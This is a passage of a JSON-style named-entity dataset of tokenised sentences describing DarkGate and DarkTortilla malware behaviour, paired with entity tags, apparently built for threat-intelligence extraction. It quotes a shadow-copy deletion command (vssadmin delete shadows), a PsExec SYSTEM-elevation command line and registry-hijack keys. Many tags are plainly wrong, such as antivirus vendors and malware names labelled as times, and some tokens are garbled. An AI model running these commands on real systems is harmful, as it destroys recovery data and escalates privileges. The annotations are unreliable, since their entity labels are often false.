"I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "command", - "and", - "control", - "includes", - "hard-coded", - "domains", - "in", - "the", - "malware", - "chosen", - "to", - "masquerade", - "as", - "legitimate", - "services", - "such", - "as", - "Akamai", - "CDN", - "or", - "Amazon", - "Web", - "Services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "masquerades", - "malicious", - "LNK", - "files", - "as", - "PDF", - "objects", - "using", - "the", - "double", - "extension", - "<code>.pdf.lnk</code>." - ], - "ner_tags": [ - "B-Idus", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkGate", - "drops", - "an", - "encrypted", - "PE", - "file,", - "pe.bin,", - "and", - "decrypts", - "it", - "during", - "installation.", - "DarkGate", - "also", - "uses", - "custom", - "base64", - "encoding", - "schemas", - "in", - "later", - "variations", - "to", - "obfuscate", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "per-victim", - "links", - "for", - "hosting", - "malicious", - "archives,", - "such", - "as", - "ZIP", - "files,", - "in", - "services", - "such", - "as", - "SharePoint", - "to", - "prevent", - "other", - "entities", - "from", - "retrieving", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "existing", - "command", - "and", - "control", - "channels", - "to", - "retrieve", - "captured", - "cryptocurrency", - "wallet", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "versions", - "of", - "DarkGate", - "search", - "for", - "the", - "hard-coded", - "folder", - "<code>C:\\Program", - "Files\\e", - "Carte", - "Bleue</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "can", - "deploy", - "payloads", - "capable", - "of", - "capturing", - "credentials", - "related", - "to", - "cryptocurrency", - "wallets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "initial", - "installation", - "involves", - "dropping", - "several", - "files", - "to", - "a", - "hidden", - "directory", - "named", - "after", - "the", - "victim", - "machine", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "command", - "and", - "control", - "includes", - "hard-coded", - "domains", - "in", - "the", - "malware", - "masquerading", - "as", - "legitimate", - "services", - "such", - "as", - "Akamai", - "CDN", - "or", - "Amazon", - "Web", - "Services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Tool", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "DarkGate", - "edits", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Classes\\mscfile\\shell\\open\\command</code>", - "to", - "execute", - "a", - "malicious", - "AutoIt", - "script.", - "When", - "eventvwr.exe", - "is", - "executed,", - "this", - "will", - "call", - "the", - "Microsoft", - "Management", - "Console", - "(mmc.exe),", - "which", - "in", - "turn", - "references", - "the", - "modified", - "Registry", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "retrieves", - "cryptocurrency", - "mining", - "payloads", - "and", - "commands", - "in", - "encrypted", - "traffic", - "from", - "its", - "command", - "and", - "control", - "server.", - "DarkGate", - "uses", - "Windows", - "Batch", - "scripts", - "executing", - "the", - "<code>curl</code>", - "command", - "to", - "retrieve", - "follow-on", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "can", - "delete", - "system", - "restore", - "points", - "through", - "the", - "command", - "<code>cmd.exe", - "/c", - "vssadmin", - "delete", - "shadows", - "/for=c:", - "/all", - "/quiet”</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "will", - "spawn", - "a", - "thread", - "on", - "execution", - "to", - "capture", - "all", - "keyboard", - "events", - "and", - "write", - "them", - "to", - "a", - "predefined", - "log", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "creates", - "a", - "local", - "user", - "account,", - "<code>SafeMode</code>,", - "via", - "<code>net", - "user</code>", - "commands." - ], - "ner_tags": [ - "B-Idus", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "initial", - "infection", - "payloads", - "can", - "masquerade", - "as", - "pirated", - "media", - "content", - "requiring", - "user", - "interaction", - "for", - "code", - "execution.", - "DarkGate", - "is", - "distributed", - "through", - "phishing", - "links", - "to", - "VBS", - "or", - "MSI", - "objects", - "requiring", - "user", - "interaction", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "can", - "masquerade", - "as", - "pirated", - "media", - "content", - "for", - "initial", - "delivery", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "the", - "native", - "Windows", - "API", - "<code>CallWindowProc()</code>", - "to", - "decode", - "and", - "launch", - "encoded", - "shellcode", - "payloads", - "during", - "execution.", - "DarkGate", - "can", - "call", - "kernel", - "mode", - "functions", - "directly", - "to", - "hide", - "the", - "use", - "of", - "process", - "hollowing", - "methods", - "during", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "a", - "hard-coded", - "string", - "as", - "a", - "seed,", - "along", - "with", - "the", - "victim", - "machine", - "hardware", - "identifier", - "and", - "input", - "text,", - "to", - "generate", - "a", - "unique", - "string", - "used", - "as", - "an", - "internal", - "mutex", - "value", - "to", - "evade", - "static", - "detection", - "based", - "on", - "mutexes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "relies", - "on", - "parent", - "PID", - "spoofing", - "as", - "part", - "of", - "its", - "\"rootkit-like\"", - "functionality", - "to", - "evade", - "detection", - "via", - "Task", - "Manager", - "or", - "Process", - "Explorer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "overrides", - "the", - "<code>%windir%</code>", - "environment", - "variable", - "by", - "setting", - "a", - "Registry", - "key,", - "<code>HKEY_CURRENT_User\\Environment\\windir</code>,", - "to", - "an", - "alternate", - "command", - "to", - "execute", - "a", - "malicious", - "AutoIt", - "script.", - "This", - "allows", - "DarkGate", - "to", - "run", - "every", - "time", - "the", - "scheduled", - "task", - "<code>DiskCleanup</code>", - "is", - "executed", - "as", - "this", - "uses", - "the", - "path", - "value", - "<code>%windir%\\system32\\cleanmgr.exe</code>", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "performs", - "various", - "checks", - "for", - "running", - "processes,", - "including", - "security", - "software", - "by", - "looking", - "for", - "hard-coded", - "process", - "name", - "values." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "leverages", - "process", - "hollowing", - "techniques", - "to", - "evade", - "detection,", - "such", - "as", - "decrypting", - "the", - "content", - "of", - "an", - "encrypted", - "PE", - "file", - "and", - "injecting", - "it", - "into", - "the", - "process", - "vbc.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkGate", - "installation", - "includes", - "AutoIt", - "script", - "execution", - "creating", - "a", - "shortcut", - "to", - "itself", - "as", - "an", - "LNK", - "object,", - "such", - "as", - "bill.lnk,", - "in", - "the", - "victim", - "startup", - "folder.", - "DarkGate", - "installation", - "finishes", - "with", - "the", - "creation", - "of", - "a", - "registry", - "Run", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "executes", - "a", - "Windows", - "Batch", - "script", - "during", - "installation", - "that", - "creases", - "a", - "randomly-named", - "directory", - "in", - "the", - "<code>C:\\\\</code>", - "root", - "directory", - "that", - "copies", - "and", - "renames", - "the", - "legitimate", - "Windows", - "<curl>curl</code>", - "command", - "to", - "this", - "new", - "location." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "can", - "deploy", - "follow-on", - "cryptocurrency", - "mining", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "looks", - "for", - "various", - "security", - "products", - "by", - "process", - "name", - "using", - "hard-coded", - "values", - "in", - "the", - "malware.", - "DarkGate", - "will", - "not", - "execute", - "its", - "keylogging", - "thread", - "if", - "a", - "process", - "name", - "associated", - "with", - "Trend", - "Micro", - "anti-virus", - "is", - "identified,", - "or", - "if", - "runtime", - "checks", - "identify", - "the", - "presence", - "of", - "Kaspersky", - "anti-virus.", - "DarkGate", - "will", - "initiate", - "a", - "new", - "thread", - "if", - "certain", - "security", - "products", - "are", - "identified", - "on", - "the", - "victim,", - "and", - "recreate", - "any", - "malicious", - "files", - "associated", - "with", - "it", - "if", - "it", - "determines", - "they", - "were", - "removed", - "by", - "security", - "software", - "in", - "a", - "new", - "system", - "location." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "tries", - "to", - "elevate", - "privileges", - "to", - "<code>SYSTEM</code>", - "using", - "PsExec", - "to", - "locally", - "execute", - "as", - "a", - "service,", - "such", - "as", - "<code>cmd", - "/c", - "c:\\temp\\PsExec.exe", - "-accepteula", - "-j", - "-d", - "-s", - "[Target", - "Binary]</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "can", - "be", - "distributed", - "through", - "emails", - "with", - "malicious", - "attachments", - "from", - "a", - "spoofed", - "email", - "address." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "is", - "distributed", - "in", - "phishing", - "emails", - "containing", - "links", - "to", - "distribute", - "malicious", - "VBS", - "or", - "MSI", - "files.", - "DarkGate", - "uses", - "applications", - "such", - "as", - "Microsoft", - "Teams", - "for", - "distributing", - "links", - "to", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "queries", - "system", - "resources", - "on", - "an", - "infected", - "machine", - "to", - "identify", - "if", - "it", - "is", - "executing", - "in", - "a", - "sandbox", - "or", - "virtualized", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "the", - "Delphi", - "methods", - "<code>Sysutils::DiskSize</code>", - "and", - "<code>GlobalMemoryStatusEx</code>", - "to", - "collect", - "disk", - "size", - "and", - "physical", - "memory", - "as", - "part", - "of", - "the", - "malware's", - "anti-analysis", - "checks", - "for", - "running", - "in", - "a", - "virtualized", - "environment.", - "DarkGate", - "will", - "gather", - "various", - "system", - "information", - "such", - "as", - "display", - "adapter", - "description,", - "operating", - "system", - "type", - "and", - "version,", - "processor", - "type,", - "and", - "RAM", - "amount." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "queries", - "system", - "locale", - "information", - "during", - "execution.", - "Later", - "versions", - "of", - "DarkGate", - "query", - "<code>GetSystemDefaultLCID</code>", - "for", - "locale", - "information", - "to", - "determine", - "if", - "the", - "malware", - "is", - "executing", - "in", - "Russian-speaking", - "countries." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "creates", - "a", - "log", - "file", - "for", - "capturing", - "keylogging,", - "clipboard,", - "and", - "related", - "data", - "using", - "the", - "victim", - "host's", - "current", - "date", - "for", - "the", - "filename.", - "DarkGate", - "queries", - "victim", - "system", - "epoch", - "time", - "during", - "execution.", - "DarkGate", - "captures", - "system", - "time", - "information", - "as", - "part", - "of", - "automated", - "profiling", - "on", - "initial", - "installation." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "NirSoft", - "tools", - "to", - "steal", - "user", - "credentials", - "from", - "the", - "infected", - "machine.", - "NirSoft", - "tools", - "are", - "executed", - "via", - "process", - "hollowing", - "in", - "a", - "newly-created", - "instance", - "of", - "vbc.exe", - "or", - "regasm.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkGate", - "initial", - "infection", - "mechanisms", - "include", - "masquerading", - "as", - "pirated", - "media", - "that", - "launches", - "malicious", - "VBScript", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "a", - "malicious", - "Windows", - "Batch", - "script", - "to", - "run", - "the", - "Windows", - "<code>code</code>", - "utility", - "to", - "retrieve", - "follow-on", - "script", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "detect", - "profilers", - "by", - "verifying", - "the", - "`COR_ENABLE_PROFILING`", - "environment", - "variable", - "is", - "present", - "and", - "active." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "download", - "a", - "clipboard", - "information", - "stealer", - "module." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "used", - "the", - "`WshShortcut`", - "COM", - "object", - "to", - "create", - "a", - ".lnk", - "shortcut", - "file", - "in", - "the", - "Windows", - "startup", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "detect", - "debuggers", - "by", - "using", - "functions", - "such", - "as", - "`DebuggerIsAttached`", - "and", - "`DebuggerIsLogging`.", - "DarkTortilla", - "can", - "also", - "detect", - "profilers", - "by", - "verifying", - "the", - "`COR_ENABLE_PROFILING`", - "environment", - "variable", - "is", - "present", - "and", - "active." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "decrypt", - "its", - "payload", - "and", - "associated", - "configuration", - "elements", - "using", - "the", - "Rijndael", - "cipher." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "use", - "a", - ".NET-based", - "DLL", - "named", - "`RunPe6`", - "for", - "process", - "injection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "used", - "`%HiddenReg%`", - "and", - "`%HiddenKey%`", - "as", - "part", - "of", - "its", - "persistence", - "via", - "the", - "Windows", - "registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "download", - "additional", - "packages", - "for", - "keylogging,", - "cryptocurrency", - "mining,", - "and", - "other", - "capabilities;", - "it", - "can", - "also", - "retrieve", - "malicious", - "payloads", - "such", - "as", - "Agent", - "Tesla,", - "AsyncRat,", - "NanoCore,", - "RedLine,", - "Cobalt", - "Strike,", - "and", - "Metasploit." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "check", - "for", - "internet", - "connectivity", - "by", - "issuing", - "HTTP", - "GET", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "download", - "a", - "keylogging", - "module." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "relied", - "on", - "a", - "user", - "to", - "open", - "a", - "malicious", - "document", - "or", - "archived", - "file", - "delivered", - "via", - "email", - "for", - "initial", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla's", - "payload", - "has", - "been", - "renamed", - "`PowerShellInfo.exe`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "modified", - "registry", - "keys", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "use", - "a", - "variety", - "of", - "API", - "calls", - "for", - "persistence", - "and", - "defense", - "evasion." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "been", - "obfuscated", - "with", - "the", - "DeepSea", - ".NET", - "and", - "ConfuserEx", - "code", - "obfuscators." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "enumerate", - "a", - "list", - "of", - "running", - "processes", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "established", - "persistence", - "via", - "the", - "`Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Run`", - "registry", - "key", - "and", - "by", - "creating", - "a", - ".lnk", - "shortcut", - "file", - "in", - "the", - "Windows", - "startup", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "check", - "for", - "the", - "Kaspersky", - "Anti-Virus", - "suite." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "been", - "distributed", - "via", - "spearphishing", - "emails", - "containing", - "archive", - "attachments,", - "with", - "file", - "types", - "such", - "as", - ".iso,", - ".zip,", - ".img,", - ".dmg,", - "and", - ".tar,", - "as", - "well", - "as", - "through", - "malicious", - "documents." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "search", - "a", - "compromised", - "system's", - "running", - "processes", - "and", - "services", - "to", - "detect", - "Hyper-V,", - "QEMU,", - "Virtual", - "PC,", - "Virtual", - "Box,", - "and", - "VMware,", - "as", - "well", - "as", - "Sandboxie." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Idus", - "I-Tool", - "O", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "obtain", - "system", - "information", - "by", - "querying", - "the", - "`Win32_ComputerSystem`,", - "`Win32_BIOS`,", - "`Win32_MotherboardDevice`,", - "`Win32_PnPEntity`,", - "and", - "`Win32_DiskDrive`", - "WMI", - "objects." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "retrieve", - "information", - "about", - "a", - "compromised", - "system's", - "running", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "implement", - "the", - "`kernel32.dll`", - "Sleep", - "function", - "to", - "delay", - "execution", - "for", - "up", - "to", - "300", - "seconds", - "before", - "implementing", - "persistence", - "or", - "processing", - "an", - "addon", - "package." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "used", - "HTTP", - "and", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "retrieve", - "its", - "primary", - "payload", - "from", - "public", - "sites", - "such", - "as", - "Pastebin", - "and", - "Textbin." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DarkTortilla", - "can", - "use", - "`cmd.exe`", - "to", - "add", - "registry", - "keys", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - 